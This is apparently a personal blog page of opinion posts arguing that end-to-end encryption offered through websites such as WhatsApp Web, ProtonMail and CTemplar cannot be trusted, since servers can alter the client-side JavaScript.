A draft of some HTML extensions and one “browser rule” to secure web end-to-end encrypted communications

[Last edited on Friday, May the 20th, 2022, 07:30]

Nowadays there’s a huge security problem with webapps claiming to provide end-to-end secure encryption. The problem does not reside into end-to-end encryption itself: it can be secure enough for every kind of end user, when it’s well implemented and its implementations are periodically enough audited by affordable third parties. The main and by far biggest problem with end-to-end encryption through webapps (that is, through web sites) currently resides in the fact that any webapp, with its javascript client-side code, is delivered to any user – that is you, me, anyone else – every time he/she/* opens a “page” (an URL). This means that there can’t be any effective auditing activity by affordable third parties to ensure a webapp claiming to be secure does what it should and does not what it shouldn’t, since any malicious actor with access to the web server(s) it runs on could at any time change the code to steal any (possibly targeted) user’s supposedly client-side-only and secure data.

Continua a leggere A draft of some HTML extensions and one “browser rule” to secure web end-to-end encrypted communications

CTemplar, “the only really secure end-to-end encrypted webmail”, can’t be trusted (as any other)

It’s silly.
CTemplar is a recent player in “secure end-to-end encrypted webmail” field.
They claim: «Our mission is to provide an anonymous E2EE (End to End Encrypted) email. No one except you and your recipient can read the contents of your emails, not even us» (archived).
They also claim: «In November of 2018, Professor Kobeissi revealed that if JavaScript is required for encryption, it can also be used to hack users who use end-to-end encrypted email services. How Did We Solve This With Checksums? The checksums, released on GitHub after every update, allows our users to quickly compare the code served to their browser, with the code hosted on GitHub within 15-30 seconds. Usually, comparing code can take hours or days. With checksums, you can do it in seconds» (archived – you can read Kobeissi findings here).
They give instructions about how to “quickly compare the code served to their [the users’] browser, with the code hosted on GitHub within 15-30 seconds” here (archived).
But the fact is: all users should spend “15-30 seconds” (I spent at least one minute when trying) every time they access any URL serving CTemplar webmail service on https://mail.ctemplar.com/, in order to maybe feel certain (and currently not to be certain: see below) that the Javascript code running in their browsers is actually the same as that published on github – which is evidently totally impractical for anyone.
And the fact is: when I tried, the login page to their webmail service (archived) was not the same as the login page they published on github (archived): it sourced some more Javascript code at the end.

CTemplar login page source

And the fact is: would have it been the same, I still could not have been certain the Javascript code running in my browser was the same as that published on github, since for example the browser-compatibility.js file (among many other files the index.html sourced) had two integrity checksums.

CTemplar login page source (2)

The checksum of the browser-compatibility.js file published on github actually matched the first one specified in the integrity attribute for browser-compatibility.js on the page I got from the server, but I actually could have received the other, unknown and different browser-compatibility.js that is not published on github and that matches the second checksum (the problem here is that SRI allows to specify more than one checksum for a given file).
What does this all mean?
This means and confirms that Services offering end-to-end encryption through web sites can’t be trusted.

Services offering end-to-end encryption through web sites can’t be trusted

A false sense of security is worse than no security at all

[Last modified on Tuesday, June 14, 2022, 14:54: added a paragraph summarizing the problem at the beginning of the first imaginary reply]

Whatsapp, Telegram, Element/Matrix, Protonmail, Tutanota are just the most known and widely used services, among many, offering end-to-end encryption not only through their apps, but also through their web sites.

Can users of these web sites be confident that the people behind these web sites’ servers can’t read their “end-to-end encrypted” contents?

No, they can’t.
Not because end-to-end encryption itself is not secure (it can be); just because the delivery model of web apps, and particularly of their client-side code (i.e. code that will be executed on the user’s device), is incompatible with security: on the server-side, the client-side code that will be executed on the user’s device can be changed at any time by anyone who has access to the server(s) with very little probability of anyone noticing (not the users, and less so a “targeted” user, and less so any “third parties”). It’s not a mistery: anyone with some knowledge of how a browser works knows this; and it’s not even much of a problem (arguably, but this is my opinion), when users trust their web app providers and don’t need to trust that their data are inaccessible to anyone, i.e. not even their web app providers and in general the people on its server(s) side; it is a problem, though, when users do need to be sure of this, and it’s even more a problem when they are told, by the service owners, that this is the case: that nobody, not even them, the service providers and the people on the server(s) side, can access users’ data, while that’s just not true with web apps.
First, let’s get rid of one possible misconception: HTTPS does not make your contents unreadable by the people behind these or any other web site’s servers, it just gives you and those people pretty good security against others who may try to read your contents on the path between your device and the web sites’ servers.
Then, to the point, let’s make an example. User John logs into web.whatsapp.com and starts typing for his friend Bob, believing Whatsapp claims that what he will send through Whatsapp servers will only be readable by Bob and nobody else, not even the people at Whatsapp, since it is always end-to-end encrypted. Jimmy, an admin at web.whatsapp.com, could have set the servers so that they included into the web “page” that John is using a little javascript key-logging function that sends what John is typing to Whatsapp servers, unencrypted; and Jimmy could have set it just for John, and just for a few hours.

Is there something John can do, when using web sites offering end-to-end encryption, to be sure the people behind the servers actually won’t read what they are not meant to read?

In order to be sure of that, John should read the whole content his browser gets on each “page” (URL) access and understand what its client-side code actually does, which is totally impractical for anyone.

Could Jimmy-the-admin get to know John’s password too?

If Jimmy worked for Element/Matrix, Protonmail or Tutanota, I’m sure he could, since all these service providers’ web sites have a login page with a password field; their login pages usually include javascript code that, on users’ login, hashes users’ passwords before sending these hashes to the provider’s servers; when this is the case, the people behind these web sites servers actually can’t get to know their users’ passwords, but at any time these people can omit the password-hashing javascript code from any (“targeted”, in case) user’s login page, or include the usual password-hashing javascript code with just a few changes making it do absolutely nothing; this way they can receive any user’s password in clear text.

What can they do, once they get to know a user’s password, say John’s password?

Once they know John’s password, without doing any more “tricks”, they can decrypt John’s private key, that, if John has used one of these web sites even just once, has been stored on their servers (this is declaredly the case with Protonmail, see https://security.stackexchange.com/a/58552; page is archived here: https://archive.is/GQUf3; I’m almost certain it’s the case also with Element/Matrix, Tutanota and all the other providers offering end-to-end encryption through their web sites without requiring their users to pick a local file containing the private key each time it is needed); once they have decrypted John’s private key, they can save it unencrypted on their side and, since that very moment, they can read any encrypted content John received that is still on their servers; they can read any encrypted content John will receive; they can read any encrypted content John has sent that is still on their servers, if John encrypted it with his own public key as well as with his recipients’ ones (which is common practice); they can read any encrypted content John will send, if John will encrypt it with his own public key too ––– and, since that very moment, they can do all of this not only when John is using their web sites, but also when he’s using their applications, because any content John receives and sends, even when using their applications, always passes through their servers; last but not least, they can also send encrypted and-or signed contents on John’s behalf.
I’m also sure
that even the people behind the servers at Whatsapp, Telegram, and any other provider whose web site’s login page uses a login method not requiring a password, can get to know, on each login (authentication) John does with their web sites, a “secret” of John’s allowing them to unlock his private key, since in any case they need to do it without requiring John to pick a file with his private key every time it is needed; and in any case, as I wrote above, they can read what he’s writing (and what other “targeted” John’s friends are writing, too) with a simple javascript keylogger.

– Do you think these security issues have been exploited yet?

I can’t be sure, of course, but there are many suspicious cases: see here and here, for example. In these cases, involving Telegram and Protonmail, it’s not clear and not explained whether Telegram and Protonmail provided authorities with just users’ metadata or even users’ data (conversations contents), but they surely could, in spite of what the already linked Wikipedia page is currently telling: it’s just not true, currently, that «Due to the encryption utilized, Proton Mail is unable to hand over the contents of encrypted emails under any circumstances», as it’s just currently not true in any other case of services offering end-to-end encryption through their web sites.

[Update: I wrote a post showing how end-to-end encryption could safely be implemented into web browsers]

[Update: CTemplar have the same issues, but blows more smoke in our eyes]

[I wrote this post in the guise of a dialogue and using male imaginary characters for the sake of comprehensibility and readability]

[My advice to anyone who wants or needs to do instant messaging with affordable end-to-end encryption, that is privacy, is to use Briar, XMPP with OMEMO, or Signal; for affordable e-mail end-to-end encryption on the desktop I suggest using Claws mail with its PGP plugins relying on GnuPG; there may be other affordable desktop e-mail clients (you can see here, although I don’t trust that page suggestions – more on this below), but I have not tested them; for affordable e-mail end-to-end encryption on Android I suggest using K-9 Mail or FairEmail, although they both rely on OpenKeychain for encryption: OpenKeychain is a good project, but sadly it is no longer actively developed since 2018; again: there may be others, but I have not tested them and I don’t trust openpgp.org suggestions since they state that «No security audits have been done by us and, thus, we cannot provide any security guarantees» and also because, in regard to webmail “clients” like Protonmail, Tutanota, etc., they just state a mild «some people don’t consider these “end-to-end secure”» while they have all the means to understand, and could and should declare, that services offering end-to-end encryption through web sites pose a huge security threat to their users]